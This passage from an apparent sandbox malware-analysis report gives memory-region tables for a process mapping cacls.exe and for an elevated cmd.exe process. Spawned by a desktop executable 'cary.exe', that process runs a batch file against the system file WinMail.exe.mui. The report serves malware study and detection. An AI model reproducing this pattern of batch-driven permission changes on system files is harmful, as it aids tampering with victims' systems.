| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00330000 | 0x003edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x004a0000 | 0x007d6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eeb0000 | 0x7eeb0000 | 0x7efaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd7000 | 0x7efd7000 | 0x7efd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efda000 | 0x7efda000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdc000 | 0x7efdc000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #232: cmd.exe
0
0
| Information | Value |
|---|---|
| ID | #232 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:39, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcb0 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000220000 | 0x00220000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00241fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00263fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f430000 | 0x7f430000 | 0x7f452fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f457000 | 0x7f457000 | 0x7f457fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f45b000 | 0x7f45b000 | 0x7f45bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f45d000 | 0x7f45d000 | 0x7f45ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
